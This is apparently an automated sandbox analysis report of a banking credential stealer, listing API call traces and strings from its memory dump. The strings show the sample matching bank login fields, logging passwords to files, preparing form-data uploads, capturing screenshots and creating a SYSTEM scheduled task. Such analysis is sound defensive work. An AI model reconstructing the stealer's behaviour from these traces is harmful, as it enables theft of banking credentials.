                                                                                                                                                                                                              • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44DC
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44EF
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD4502
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4528
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4562
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD45CD
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: GetLastError.KERNEL32 ref: 02BD45D7
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02BC8A5C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02BC8A6C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058,?,?,?,?,?,?), ref: 02BC8A9D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C058,?,?,?,?,?,?), ref: 02BC8AAB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8AB8
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058,?,?,?,?,?,?), ref: 02BC8ABF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02BC8B2E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C,?,?,?,?,?,?), ref: 02BC8B5D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C15C,?,?,?,?,?,?), ref: 02BC8B6B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8B78
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C,?,?,?,?,?,?), ref: 02BC8B7F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02BC8BF3
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02BC8C03
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02BC8C13
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C468,?,?,?,?,?,?), ref: 02BC8C3D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C468,?,?,?,?,?,?), ref: 02BC8C4B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8C58
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C468,?,?,?,?,?,?), ref: 02BC8C5F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02BC8CCF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C,?,?,?,?,?,?), ref: 02BC8CFD
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C56C,?,?,?,?,?,?), ref: 02BC8D0B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8D18
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C,?,?,?,?,?,?), ref: 02BC8D1F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02BC8D93
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774,?,?,?,?,?,?), ref: 02BC8DBD
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C774,?,?,?,?,?,?), ref: 02BC8DCB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774,?,?,?,?,?,?), ref: 02BC8DD6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02BC8E43
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E6D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0CF94,?,?,?,?,?,?), ref: 02BC8E7B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E86
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3570,00000000,00000000,00000000), ref: 02BC8EE8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BC8F00
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BC8F11
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                            • String ID: &LOGIN_AUTHORIZATION_CODE=$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                            • API String ID: 4254156133-1224950822
                                                                                                                                                                                                            • Opcode ID: 9a0e031ef87e9574c74e0cf9dac8ab6dc2b0ad6e18f0e5c79d53400609df9f64
                                                                                                                                                                                                            • Instruction ID: 12e6dfba094bef9b8b3ba6623eb5fd6a4e1f96e30068a62c689d1bb51b4b6ff3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a0e031ef87e9574c74e0cf9dac8ab6dc2b0ad6e18f0e5c79d53400609df9f64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22D12835A442149BDB229B289C40BEB7FF89F95B40F2485DAEAC597240CFB09945CFE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02BC0981
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0984
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC099E
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02BC09BE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC09DF
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC09E2
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC09F7
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BC0A0D
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02BC0A29
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02BC0A3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02BC0A4C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0A4F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0A6A
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02BC0A7D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC0AC9
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0ACC
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0AE0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0AF0
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC0AFE
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC0B40
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC0B6C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0B6F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC0B7C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0B7F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0B8B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0B8E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0B9B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0B9E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0BB4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0BB7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0BC4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0BC7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02BC0BE6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0BEF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0BF8
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0BFB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0C07
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0C0A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0C13
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0C16
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                            • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                            • API String ID: 1808236364-2343086565
                                                                                                                                                                                                            • Opcode ID: f9811876acfa94f242b01e795b253783729c826d3f7884f978961fee42805e42
                                                                                                                                                                                                            • Instruction ID: 95b2b1b366c610483722889f4316eaf73a3dfa6d5152170eb198952e3fce1cce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9811876acfa94f242b01e795b253783729c826d3f7884f978961fee42805e42
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1A1A271D00219AFDB20EF68DC49FAFBBB8EF84754F144588FA44A7280DB709955CBA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 02BC2AAC
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2AC5
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BC2ACC
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02BC2B0B
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2B25
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BC2B2F
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02BC2BA8
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC2BCE
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC2BED
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,02BFFB50,00000000), ref: 02BC2C0F
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC2C2A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC2C35
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02BC2C52
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02BC2C84
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC2C8B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC2C9F
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02BC2D40
                                                                                                                                                                                                            • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02BC2D51
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02BC2D61
                                                                                                                                                                                                            • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02BC2D72
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D7B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC2D82
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D8F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC2D96
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DB1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC2DB4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DC1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC2DC4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC2DE1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC2DF3
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB50), ref: 02BC2DFE
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC2E39
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E48
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02BC2E5B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E68
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                            • String ID: 69889366a$698893a4a$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                            • API String ID: 255608459-3660153349
                                                                                                                                                                                                            • Opcode ID: ef35ca78aa212d3b28078e71e7f92a118c7fbee0865416c366c2b21aeec664db
                                                                                                                                                                                                            • Instruction ID: c5e7883f3412f09b2543eb06d3e3ecbdff9bef7809884d2d5beb4a3abab6140c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef35ca78aa212d3b28078e71e7f92a118c7fbee0865416c366c2b21aeec664db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65C1E231644305AFE7209F249C98FABBBA8EF88744F544A5CFA85DB180DB70D914CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BC3BCA
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC3C72
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BC3C7F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BC3C85
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC3CA2
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BC3CB9
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BC3CD6
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 02BC3D05
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                            • String ID: -----------------------------$%s%u.zip$--$-----------------------------$6a52c6225f6f323$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                            • API String ID: 3203035732-3869958749
                                                                                                                                                                                                            • Opcode ID: c8dec1f8bedc3356354eec1b26ff1207768ec3dc4e0a9ee2a3247eec6552390c
                                                                                                                                                                                                            • Instruction ID: e2428dcd79b507c15aaee88293c68a2192306c01cfc645e497384e1dcd345c56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8dec1f8bedc3356354eec1b26ff1207768ec3dc4e0a9ee2a3247eec6552390c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F15D319046465BCB258F3098A4BFB7BF6EF45344FA485C8ED869B241DB32DA49C7A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • <Actions , xrefs: 0040380A
                                                                                                                                                                                                            • task%d, xrefs: 0040365C
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                            • 00-->, xrefs: 0040383F
                                                                                                                                                                                                            • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                            • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                            • API String ID: 1601901853-1561668989
                                                                                                                                                                                                            • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                            • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 02BC2053
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02BC2064
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02BC2079
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BC208E
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02BC20A8
                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02BC20D6
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 02BC20EC
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32 ref: 02BC215C
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02BC216F
                                                                                                                                                                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02BC218C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02BC255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC21A6
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC21CD
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC21EF
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(02BC255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02BC2209
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC2214
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC223C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 02BC224C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02BC2260
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02BC2270
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC227F
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 02BC228F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02BC22A3
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 02BC22B3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC22CC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BC22DB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02BC22EE
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BC22FD
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 02BC2308
                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 02BC230F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC2323
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC2335
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BC2340
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 02BC234C
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02BC2358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
